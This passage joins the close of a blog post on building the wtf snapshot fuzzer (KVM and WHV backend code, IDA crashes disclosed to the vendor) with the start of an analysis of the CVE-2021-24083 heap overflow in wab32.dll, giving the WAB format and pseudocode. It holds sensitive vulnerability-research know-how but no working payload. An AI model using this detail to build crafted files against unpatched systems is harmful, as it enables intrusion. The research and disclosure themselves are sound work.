  if (!WriteAccess) {
    fmt::print("Dont know how to handle this fault, exiting.\n");
    __debugbreak();
    return E_FAIL;
  }

  //
  // Remap the page as writeable.
  //

  const WHV_MAP_GPA_RANGE_FLAGS Flags = WHvMapGpaRangeFlagWrite |
                                        WHvMapGpaRangeFlagRead |
                                        WHvMapGpaRangeFlagExecute;

  const Gpa_t AlignedGpa = Gpa.Align();
  DirtyGpa(AlignedGpa);

  uint8_t *AlignedHva = PhysTranslate(AlignedGpa);
  return MapGpaRange(AlignedHva, AlignedGpa, Page::Size, Flags);
}

Once that was fixed, I noticed that WHvTranslateGva was also slower than I expected, which is why I emulated its behavior as well by walking the page tables myself:

HRESULT
WhvBackend_t::TranslateGva(const Gva_t Gva, const WHV_TRANSLATE_GVA_FLAGS,
                           WHV_TRANSLATE_GVA_RESULT &TranslationResult,
                           Gpa_t &Gpa) const {

  //
  // Stole most of the logic from @yrp604's code so thx bro.
  //

  const VIRTUAL_ADDRESS GuestAddress = Gva.U64();
  const MMPTE_HARDWARE Pml4 = GetReg64(WHvX64RegisterCr3);
  const uint64_t Pml4Base = Pml4.PageFrameNumber * Page::Size;
  const Gpa_t Pml4eGpa = Gpa_t(Pml4Base + GuestAddress.Pml4Index * 8);
  const MMPTE_HARDWARE Pml4e = PhysRead8(Pml4eGpa);
  if (!Pml4e.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  const uint64_t PdptBase = Pml4e.PageFrameNumber * Page::Size;
  const Gpa_t PdpteGpa = Gpa_t(PdptBase + GuestAddress.PdPtIndex * 8);
  const MMPTE_HARDWARE Pdpte = PhysRead8(PdpteGpa);
  if (!Pdpte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // huge pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // directory; see Table 4-1
  //

  const uint64_t PdBase = Pdpte.PageFrameNumber * Page::Size;
  if (Pdpte.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PdBase + (Gva.U64() & 0x3fff'ffff));
    return S_OK;
  }

  const Gpa_t PdeGpa = Gpa_t(PdBase + GuestAddress.PdIndex * 8);
  const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa);
  if (!Pde.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  //
  // large pages:
  // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page
  // table; see Table 4-18
  //

  const uint64_t PtBase = Pde.PageFrameNumber * Page::Size;
  if (Pde.LargePage) {
    TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
    Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff));
    return S_OK;
  }

  const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8);
  const MMPTE_HARDWARE Pte = PhysRead8(PteGpa);
  if (!Pte.Present) {
    TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent;
    return S_OK;
  }

  TranslationResult.ResultCode = WHvTranslateGvaResultSuccess;
  const uint64_t PageBase = Pte.PageFrameNumber * 0x1000;
  Gpa = Gpa_t(PageBase + GuestAddress.Offset);
  return S_OK;
}

Collecting dividends

Comparing the two backends, whv showed about 15x better performance than bochscpu. I was honestly a bit disappointed, as I had expected more of a 100x performance increase, but it was still a significant gain:

bochscpu:
#1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0
#2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0
#3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0
#4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0

whv:
#12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0
#30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0
#48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0
#66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0
#84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0

The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr.

2 fast 2 furious: KVM backend

I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't widespread or cheap. On top of that, I was still disappointed by the performance of whv, and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure up.

I didn't know anything about those VMMs, but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API resembling whv via /dev/kvm. This looked perfect because, if it was similar enough to whv, I could probably write a backend for it easily. The KVM API also powers Firecracker, a project that creates micro-VMs to run various workloads in the cloud, so I assumed it would offer both the rich features and the performance needed to be the foundation of such a project.
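
For readers who, like me at the time, had never touched it: the whole API is driven through file descriptors and ioctls. Below is a minimal sketch of the /dev/kvm flow (my illustration, not wtf's actual code; error handling omitted):

#include <fcntl.h>
#include <linux/kvm.h>
#include <sys/ioctl.h>

//
// Open the system handle, sanity-check the API version, then create a VM and a
// vCPU; every subsequent operation is an ioctl on one of these descriptors.
//

const int Kvm = open("/dev/kvm", O_RDWR | O_CLOEXEC);
const int Version = ioctl(Kvm, KVM_GET_API_VERSION, 0); // expected to be 12
const int Vm = ioctl(Kvm, KVM_CREATE_VM, 0);
const int Vp = ioctl(Vm, KVM_CREATE_VCPU, 0);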

KVM APIs worked very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of a guest GPR, KVM allows you to map a shared memory region with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//

VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}

//
// Man says:
//   there is an implicit parameter block that can be obtained by mmap()'ing
//   the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//

Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
if (Run_ == MAP_FAILED) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}
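
One detail worth noting (my own illustration, not a snippet from wtf): on x86 the GPRs only show up in this mapping if you opt into the sync-regs mechanism (KVM_CAP_SYNC_REGS); once you do, reads and writes go through the shared structure instead of KVM_GET_REGS / KVM_SET_REGS ioctls:

//
// Illustration only, assuming KVM_CAP_SYNC_REGS is supported by the host.
//

Run_->kvm_valid_regs = KVM_SYNC_X86_REGS;   // kernel copies the GPRs out on every exit
const uint64_t Rip = Run_->s.regs.regs.rip; // read without a KVM_GET_REGS ioctl

Run_->s.regs.regs.rax = 0;                  // modify a register in place...
Run_->kvm_dirty_regs = KVM_SYNC_X86_REGS;   // ...and have KVM load it back on the next KVM_RUN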

On-demand paging

Implementing on-demand paging with KVM was very easy. It uses userfaultfd, so you can just start a thread that polls the fd and services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {

    //
    // Set up the pool fd with the uffd fd.
    //

    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};

    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {

      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //

      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }

      perror("poll");
      exit(EXIT_FAILURE);
    }

    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //

    if (Res == 0) {
      continue;
    }

    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //

    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }

    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //

    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }

    //
    // Grab the HVA off the message.
    //

    const uint64_t Hva = UffdMsg.arg.pagefault.address;

    //
    // Compute the GPA from the HVA.
    //

    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));

    //
    // Page it in.
    //

    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };

      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //

      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};

      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}
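
The thread above only services the faults; for completeness, here is a hedged sketch of the setup side (Ram_.Size() is an assumed helper here, and the usual headers are omitted to match the other snippets): create the uffd, perform the UFFDIO_API handshake, and register the host range backing the guest RAM for missing-page events:

Uffd_ = syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (Uffd_ < 0) {
  perror("userfaultfd");
  return false;
}

//
// Handshake on the API version with the kernel.
//

struct uffdio_api UffdioApi = {.api = UFFD_API};
if (ioctl(Uffd_, UFFDIO_API, &UffdioApi) < 0) {
  perror("UFFDIO_API");
  return false;
}

//
// Register the host virtual range that backs the guest RAM so that missing
// pages generate events on the uffd.
//

struct uffdio_register UffdioRegister = {
    .range = {.start = uint64_t(Ram_.Hva()), .len = Ram_.Size()},
    .mode = UFFDIO_REGISTER_MODE_MISSING};

if (ioctl(Uffd_, UFFDIO_REGISTER, &UffdioRegister) < 0) {
  perror("UFFDIO_REGISTER");
  return false;
}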

Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When it does, I am able to program the PMU to trigger an interrupt after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interrupt called a PMI that gets delivered via the vector 0xE of the CPU's IDT. To catch it, we simply break on hal!HalpPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//

if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
              "carrying on..\n");
}

To make it work you have to program the APIC a little bit, and I remember struggling to get the interrupt to fire. I am still not 100% sure that I got the details fully right, but the interrupt triggered consistently during my tests, so I called it a day. I would also like to revisit this area in the future, as there might be other features I could use for the fuzzer.
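
For reference, the MSR side of it looks roughly like the sketch below. This is my reconstruction from the Intel SDM rather than the exact wtf code; the LAPIC performance-counter LVT entry also has to be programmed for the PMI to actually be delivered (omitted here), and Limit / Vp_ are assumed names:

//
// Sketch: arm fixed counter 0 (retired instructions) so that it overflows and
// raises a PMI after roughly Limit instructions. MSR indices per the Intel SDM.
//

constexpr uint32_t MsrFixedCtr0 = 0x309;      // IA32_FIXED_CTR0
constexpr uint32_t MsrFixedCtrCtrl = 0x38d;   // IA32_FIXED_CTR_CTRL
constexpr uint32_t MsrPerfGlobalCtrl = 0x38f; // IA32_PERF_GLOBAL_CTRL

const uint32_t Nmsrs = 3;
auto *Msrs = (struct kvm_msrs *)calloc(
    1, sizeof(struct kvm_msrs) + Nmsrs * sizeof(struct kvm_msr_entry));
Msrs->nmsrs = Nmsrs;

//
// Pre-load the counter with -Limit (assuming a 48-bit counter width) so that it
// overflows after Limit retired instructions.
//

Msrs->entries[0].index = MsrFixedCtr0;
Msrs->entries[0].data = (0ULL - Limit) & 0xffff'ffff'ffffULL;

//
// Count in ring 0 and ring 3, and raise a PMI on overflow (bits 0, 1 and 3).
//

Msrs->entries[1].index = MsrFixedCtrCtrl;
Msrs->entries[1].data = 0b1011;

//
// Globally enable fixed counter 0 (bit 32 of IA32_PERF_GLOBAL_CTRL).
//

Msrs->entries[2].index = MsrPerfGlobalCtrl;
Msrs->entries[2].data = 1ULL << 32;

if (ioctl(Vp_, KVM_SET_MSRS, Msrs) < 0) {
  perror("KVM_SET_MSRS");
}

free(Msrs);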

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great, but it was not powerful, and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had SKUs with nested virtualization available. I rented one of them to try it out, but the hardware didn't support the VMX feature called unrestricted_guest. I can't quite remember why it mattered, but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be available, and so I didn't use Azure either.

Instead, I rented a bare-metal server on vultr for about $100 / month. The CPU was a Xeon E3-1270 v6 (4 cores, 8 threads @ 3.8GHz), which seemed good enough for my usage. The hardware had a PMU, and that is also where I developed wtf's support for it.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0

To give you more details, this test case generated executions of around 195 million instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
          Dirty pages: 9166848 bytes (0 MB)
      Memory accesses: 411196757 bytes (24 MB)

Problem 10: Minsetting a 1.6m files corpus

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELFs possible. I built this corpus of 1.6 million ELF files and now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generated execution traces that eventually get merged together, but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. The clients are simply runners that send results back to the server, and all the important state is kept on the server.

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr

Wrapping up

In this post we went through the birth of wtf, a distributed, code-coverage-guided, customizable, cross-platform, snapshot-based fuzzer designed for attacking user- and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null-dereference, stack-overflows, division by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following Github repository: fuzzing-ida75.


I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.


Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend you try out their bounty program, as I am sure there's a lot to be found.

Finally big up to my bros yrp604 & __x86 for proofreading this article.

Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book

By Eneko Cruz Elejalde

Overview

This post analyzes a heap buffer overflow in Microsoft Windows Address Book. Microsoft released an advisory for this vulnerability as part of the February 2021 Patch Tuesday. This post will go into detail about what the Microsoft Windows Address Book is, the vulnerability itself, and the steps to craft a proof-of-concept exploit that crashes the vulnerable application.

Windows Address Book

Windows Address Book is a part of the Microsoft Windows operating system and is a service that provides users with a centralized list of contacts that can be accessed and modified by both Microsoft and third party applications. The Windows Address Book maintains a local database and interface for finding and editing information about contacts, and can query network directory servers using Lightweight Directory Access Protocol (LDAP). The Windows Address Book was introduced in 1996 and was later replaced by Windows Contacts in Windows Vista and subsequently by the People App in Windows 10.

The Windows Address Book provides an API that enables other applications to directly use its database and user-interface services to access and modify contact information. While Microsoft has replaced the application providing the Address Book functionality, newer replacements make use of the old functionality and ensure backwards compatibility. The Windows Address Book functionality is present in several Windows libraries that are used by Windows 10 applications, including Outlook and Windows Mail. In this way, modern applications make use of the Windows Address Book and can even import address books from older versions of Windows.

CVE-2021-24083

A heap-buffer overflow vulnerability exists within the SecurityCheckPropArrayBuffer() function within wab32.dll when processing nested properties of a contact. The network-based attack vector involves enticing a user to open a crafted .wab file containing a malicious composite property in a WAB record.

Vulnerability

The vulnerability analysis that follows is based on Windows Address Book Contacts DLL (wab32.dll) version 10.0.19041.388 running on Windows 10 x64.

The Windows Address Book Contacts DLL (i.e. wab32.dll) provides access to the Address Book API and it is used by multiple applications to interact with the Windows Address Book. The Contacts DLL handles operations related to contact and identity management. Among others, the Contacts DLL is able to import an address book (i.e, a WAB file) exported from an earlier version of the Windows Address Book.

Earlier versions of the Windows Address Book maintained a database of identities and contacts in the form of a .wab file. While current versions of Windows do not use a .wab file by default anymore, they allow importing a WAB file from an earlier installation of the Windows Address Book.

There are multiple ways of importing a WAB file into the Windows Address Book, but it was observed that applications rely on the Windows Contacts Import Tool (i.e, C:\Program Files\Windows Mail\wabmig.exe) to import an address book. The Import Tool loads wab32.dll to handle loading a WAB file, extracting relevant contacts, and importing them into the Windows Address Book.

WAB File Format

The WAB file format (commonly known as Windows Address Book or Outlook Address Book) is an undocumented and proprietary file format that contains personal identities. Identities may in turn contain contacts, and each contact might contain one or more properties.

Although the format is undocumented, the file-format has been partially reverse-engineered by a third party. The following structures were obtained from a combination of a publicly available third-party application and the disassembly of wab32.dll. Consequently, there may be inaccuracies in structure definitions, field names, and field types.

The WAB file has the following structure:

Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------
0x0         16                Magic Number            Sixteen magic bytes
0x10        4                 Count 1                 Unknown Integer
0x14        4                 Count 2                 Unknown Integer
0x18        16                Table Descriptor 1      Table descriptor
0x28        16                Table Descriptor 2      Table descriptor
0x38        16                Table Descriptor 3      Table descriptor
0x48        16                Table Descriptor 4      Table descriptor
0x58        16                Table Descriptor 5      Table descriptor
0x68        16                Table Descriptor 6      Table descriptor

All multi-byte fields are represented in little-endian byte order unless otherwise specified. All string fields are Unicode, encoded in UTF-16LE.

The Magic Number field contains the following sixteen bytes: 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4. While some sources list the sequence of bytes 81 32 84 C1 85 05 D0 11 B2 90 00 AA 00 3C F6 76 as a valid magic number for a WAB file, it was found experimentally that replacing the sequence of bytes prevents the Windows Address Book from processing the file.

Each of the six Table Descriptor fields numbered 1 through 6 has the following structure:

Offset    Length    Field    Description
          (bytes)
-------   --------  -------  -------------------
0x0       4         Type     Type of table descriptor
0x4       4         Size     Size of the record described
0x8       4         Offset   Offset of the record described relative to the beginning of file
0xC       4         Count    Number of records present at offset

The following are examples of some known types of table descriptor:

  • Text Record (Type: 0x84d0): A record containing a Unicode string.
  • Index Record (Type: 0xFA0): A record that may contain several descriptors to WAB records.
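
Putting the header and descriptor tables together, a parser might model the start of the file roughly as follows (the field names mirror the tables above and carry the same uncertainty):

#pragma pack(push, 1)
typedef struct {
    uint32_t Type;     // Type of table descriptor (e.g., 0x84D0 for text, 0xFA0 for index)
    uint32_t Size;     // Size of the record described
    uint32_t Offset;   // Offset of the record, relative to the beginning of the file
    uint32_t Count;    // Number of records present at Offset
} WAB_TABLE_DESCRIPTOR;

typedef struct {
    uint8_t  Magic[16];              // 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4
    uint32_t Count1;                 // Unknown integer
    uint32_t Count2;                 // Unknown integer
    WAB_TABLE_DESCRIPTOR Tables[6];  // Table Descriptors 1 through 6
} WAB_FILE_HEADER;
#pragma pack(pop)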

Each text record has the following structure:

Offset   Length (bytes)    Field          Description
------   --------------    ------------   -------------------
0x0      N                 Content        Text content of the record; a null terminated UNICODE string
0x0+N    0x4               RecordId       A record identifier for the text record 

Similarly, each index record has the following structure:

Offset      Length (bytes)    Field        Description
---------   --------------    ----------   -------------------
0x0         4                 RecordId     A record identifier for the index record
0x4         4                 Offset       Offset of the record relative to the beginning of the file

Each entry in the index record (i.e, each index record structure in succession) has an offset that points to a WAB record.

WAB Records

A WAB record is used to describe a contact. It contains fields such as email addresses and phone numbers stored in properties, which may be of various types such as string, integer, GUID, and timestamp. Each WAB record has the following structure:

Offset      Length   Field              Description
---------   ------   ---------------    -------------------
0x0         4        Unknown1           Unknown field
0x4         4        Unknown2           Unknown field
0x8         4        RecordId           A record identifier for the WAB record
0xC         4        PropertyCount      The number of properties contained in RecordProperties
0x10        4        Unknown3           Unknown field 
0x14        4        Unknown4           Unknown field 
0x18        4        Unknown5           Unknown field 
0x1C        4        DataLen            The length of the RecordProperties field (M)
0x20        M        RecordProperties   Succession of subproperties belonging to the WAB record
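
Expressed as a packed structure for reference (again, the names follow the table above and inherit its uncertainty):

#pragma pack(push, 1)
typedef struct {
    uint32_t Unknown1;
    uint32_t Unknown2;
    uint32_t RecordId;        // Record identifier for the WAB record
    uint32_t PropertyCount;   // Number of properties contained in RecordProperties
    uint32_t Unknown3;
    uint32_t Unknown4;
    uint32_t Unknown5;
    uint32_t DataLen;         // Length in bytes (M) of the RecordProperties data
                              // that immediately follows this header
} WAB_RECORD_HEADER;
#pragma pack(pop)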

The following fields are relevant:

  • The RecordProperties field is a succession of record property structures.
  • The PropertyCount field indicates the number of properties within the RecordProperties field.

Record properties can be either simple or composite.

Simple Properties

Simple properties have the following structure:

Offset      Length (bytes)    Field       Description
---------   --------------    ---------   -------------------
0x0         0x2               Tag         A property tag describing the type of the contents
0x2         0x2               Unknown     Unknown field
0x4         0x4               Size        Size in bytes of Value member (X)
0x8         X                 Value       Property value or content

Tags of simple properties are smaller than 0x1000, and include the following:

Tag Name        Tag Value    Length      Description
                             (bytes)
---------       -----------  ---------   -------------------
PtypInteger16   0x00000002   2           A 16-bit integer
PtypInteger32   0x00000003   4           A 32-bit integer
PtypFloating32  0x00000004   4           A 32-bit floating point number
PtypFloating64  0x00000005   8           A 64-bit floating point number
PtypBoolean     0x0000000B   2           Boolean, restricted to 1 or 0
PtypString8     0x0000001E   Variable    A string of multibyte characters in externally specified
                                         encoding with terminating null character (single 0 byte)
PtypBinary      0x00000102   Variable    A COUNT field followed by that many bytes
PtypString      0x0000001F   Variable    A string of Unicode characters in UTF-16LE format encoding
                                         with terminating null character (0x0000).
PtypGuid        0x00000048   16          A GUID with Data1, Data2, and Data3 fields in little-endian
PtypTime        0x00000040   8           A 64-bit integer representing the number of 100-nanosecond
                                         intervals since January 1, 1601
PtypErrorCode   0x0000000A   4           A 32-bit integer encoding error information

Note the following:

  • The aforementioned list is not exhaustive. For more property tag definitions, see this.
  • The value of PtypBinary is prefixed by a COUNT field, which counts 16-bit words.
  • In addition to the above, the following properties also exist; their usage in WAB is unknown.
    • PtypEmbeddedTable (0x0000000D): The property value is a Component Object Model (COM) object.
    • PtypNull (0x00000001): None: This property is a placeholder.
    • PtypUnspecified (0x00000000): Any: this property type value matches any type;

Composite Properties

Composite properties have the following structure:

Offset  Length     Field             Description
        (bytes)
------  ---------  ----------------- -------------------
0x0     0x2        Tag               A property tag describing the type of the contents
0x2     0x2        Unknown           Unknown field
0x4     0x4        NestedPropCount   Number of nested properties contained in the current WAB property
0x8     0x4        Size              Size in bytes of Value member (X)
0xC     X          Value             Property value or content
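
The two property headers differ only by the extra NestedPropCount field; as packed structures (illustrative only, same caveats as above):

#pragma pack(push, 1)
typedef struct {
    uint16_t Tag;              // Property tag, < 0x1000
    uint16_t Unknown;          // Unknown field
    uint32_t Size;             // Size in bytes (X) of the Value bytes that follow
} WAB_SIMPLE_PROPERTY_HEADER;

typedef struct {
    uint16_t Tag;              // Property tag, >= 0x1000
    uint16_t Unknown;          // Unknown field
    uint32_t NestedPropCount;  // Number of nested properties in the Value bytes
    uint32_t Size;             // Size in bytes (X) of the Value bytes that follow
} WAB_COMPOSITE_PROPERTY_HEADER;
#pragma pack(pop)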

Tags of composite properties are greater than or equal to 0x1000, and include the following:

Tag Name                Tag Value
---------               ----------
PtypMultipleInteger16   0x00001002
PtypMultipleInteger32   0x00001003
PtypMultipleString8     0x0000101E
PtypMultipleBinary      0x00001102
PtypMultipleString      0x0000101F
PtypMultipleGuid        0x00001048
PtypMultipleTime        0x00001040


The Value field of each composite property contains NestedPropCount number of Simple properties of the corresponding type.

In case of fixed-sized properties (PtypMultipleInteger16, PtypMultipleInteger32, PtypMultipleGuid, and PtypMultipleTime), the Value field of a composite property contains NestedPropCount number of the Value field of the corresponding Simple property.

For example, in a PtypMultipleInteger32 structure with NestedPropCount of 4:

  • The Size is always 16.
  • The Value contains four 32-bit integers.

In case of variable-sized properties (PtypMultipleString8, PtypMultipleBinary, and PtypMultipleString), the Value field of the composite property contains NestedPropCount number of Size and Value fields of the corresponding Simple property.

For example, in a PtypMultipleString structure with NestedPropCount of 2 containing the strings “foo” and “bar” in Unicode:

  • The Size is 14 00 00 00.
  • The Value field contains a concatenation of the following two byte-strings:
    • “foo” encoded with a four-byte length: 06 00 00 00 66 00 6f 00 6f 00.
    • “bar” encoded with a four-byte length: 06 00 00 00 62 00 61 00 72 00.

Technical Details

The vulnerability in question occurs when a malformed Windows Address Book in the form of a WAB file is imported. When a user attempts to import a WAB file into the Windows Address Book, the method WABObjectInternal::Import() is called, which in turn calls ImportWABFile(). For each contact inside the WAB file, ImportWABFile() performs the following nested calls: ImportContact(), CWABStorage::ReadRecord(), ReadRecordWithoutLocking(), and finally HrGetPropArrayFromFileRecord(). This latter function receives a pointer to a file as an argument and reads the contact header and extracts PropertyCount and DataLen. The function HrGetPropArrayFromFileRecord() in turn calls SecurityCheckPropArrayBuffer() to perform security checks upon the imported file and HrGetPropArrayFromBuffer() to read the contact properties into a property array.

The function HrGetPropArrayFromBuffer() relies heavily on the correctness of the checks performed by SecurityCheckPropArrayBuffer(). However, the latter fails to implement security checks for certain property types. Specifically, SecurityCheckPropArrayBuffer() may skip checking the contents of nested properties when the property tag is unknown, while HrGetPropArrayFromBuffer() continues to process all nested properties regardless of the security check. It is therefore possible to trick HrGetPropArrayFromBuffer() into parsing an unchecked contact property and, as a result of parsing such a property, into overflowing a heap buffer.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

The following is the pseudocode of the function HrGetPropArrayFromFileRecord:

[1]

if ( !(unsigned int)SecurityCheckPropArrayBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3]) )
  {

[2]
    result = 0x8004011b;        // Error
    goto LABEL_25;              // Return prematurely
  }

[3]
  result = HrGetPropArrayFromBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3], 0, a7);

At [1] the function SecurityCheckPropArrayBuffer() is called to perform a series of security checks upon the buffer received and the properties contained within. If the check is positive, then the input is trusted and processed by calling HrGetPropArrayFromBuffer() at [3]. Otherwise, the function returns with an error at [2].

The following is the pseudocode of the function SecurityCheckPropArrayBuffer():

    __int64 __fastcall SecurityCheckPropArrayBuffer(unsigned __int8 *buffer_ptr, unsigned int buffer_length, int header_dword_3)
    {
      unsigned int security_check_result; // ebx
      unsigned int remaining_buffer_bytes; // edi
      int l_header_dword_3; // er15
      unsigned __int8 *ptr_to_buffer; // r9
      int current_property_tag; // ecx
      __int64 c_dword_2; // r8
      unsigned int v9; // edi
      int VA; // ecx
      int VB; // ecx
      int VC; // ecx
      int VD; // ecx
      int VE; // ecx
      int VF; // ecx
      int VG; // ecx
      int VH; // ecx
      signed __int64 res; // rax
      _DWORD *ptr_to_dword_1; // rbp
      unsigned __int8 *ptr_to_dword_0; // r14
      unsigned int dword_2; // eax
      unsigned int v22; // edi
      int v23; // esi
      int v24; // ecx
      unsigned __int8 *c_ptr_to_property_value; // [rsp+60h] [rbp+8h]
